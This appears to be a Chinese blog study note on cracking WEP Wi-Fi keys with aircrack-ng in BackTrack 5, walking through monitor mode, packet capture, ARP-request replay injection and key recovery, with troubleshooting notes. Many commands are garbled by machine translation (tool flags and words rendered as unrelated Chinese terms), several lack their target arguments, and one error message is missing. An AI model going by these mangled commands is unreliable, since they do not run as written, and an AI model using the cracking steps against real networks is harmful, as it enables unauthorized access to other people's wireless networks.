关于aircrack-ng的一些学习笔记及问题

  

,,,,最近无意中接触到了一些无线方面的技术资料,又发现了一个比较速度的无线* * *方法,这个虽然没有掠夺者那么稳定,个人觉得在时间方面要比掠夺者快的多。可能做实验的笔记本太旧的原因,途中遇到几个问题,如果有同仁遇到,还请指点一二。此处先记录下这几条主要命令备忘。



环境是BT5,默认安装了较高版本,所以不用升级,但还是附上安装命令:


wget http://download.aircrack-ng.org/aircrack-ng-1.0.tar.gz焦油zxvf & lt;源file>名称;cd aircrack-ng-XXX

让安装



下面就拿WEP加密做示例:


查看无线网卡,一般默认是wlan0,如果有外置或其他无线网卡,那就选择相应的网卡启用即可。


单独查看无线网卡信息:iwconfig


启用无线网卡:ifconfig wlan0了



激活网卡至监听(监控)模式:

airmon-ng开始wlan0


扫描当前地点无线网络信息:

airodump-ng mon0


开始抓包,保存为logas前缀的。静脉注射后缀,6为美联社的频道

airodump-ng——静脉注射- w长- c 6 wlan0


在上条命令运行的情况下,打开一个新的终端窗口,输入下面命令对目标美联社进行ArpRequest注入* * *,这样采用了一种称之为ArpRequest的方式来读取ARP请求报文,并伪造大量的报文再次重发出去,以便刺激美联社产生更多的数据包,从而加快破解过程。

aireplay-ng 3 - b - h mon0


当静脉注射值达2到万以上,可尝试下面命令破解

aircrack-ng



破解成功后,KEYFOUND !后面的ACSI码就是密码



PS:

问题1:

当在新窗口输入airodump-ng——静脉注射- w长- c 6 wlan0时,遇到了报错:

ioctl (SIOCSWMODE)失败:设备或资源忙


ARP linktype设置为1(以太网)——预计ARPHRD_IEEE802.11,

AEPHRD_IEEE802.11_FULL或ARPHRD_IEEE80211_PRISM代替。使

Sysfs注入支持也没有找到。


我尝试的方法是使用命令:

 sudo  ifconfig  wlan0 下来
  sudo  iwconfig  wlan0  mode 监视器
  sudo  ifconfig  wlan0 
  sudo  iwconfig  wlan0 
<>以前sudo  airmon-ng  start  wlan0   airodump-ng ——ivs  -w  longas  -c  6, wlan0

就可以了


问题2:

aireplay-ng 3 -b , -h , mon0时,出现了错误:



这里只简单的列出了主要用到的命令,仅供实验参考,不得用于非法操作,否则后果自负。


关于aircrack-ng的一些学习笔记及问题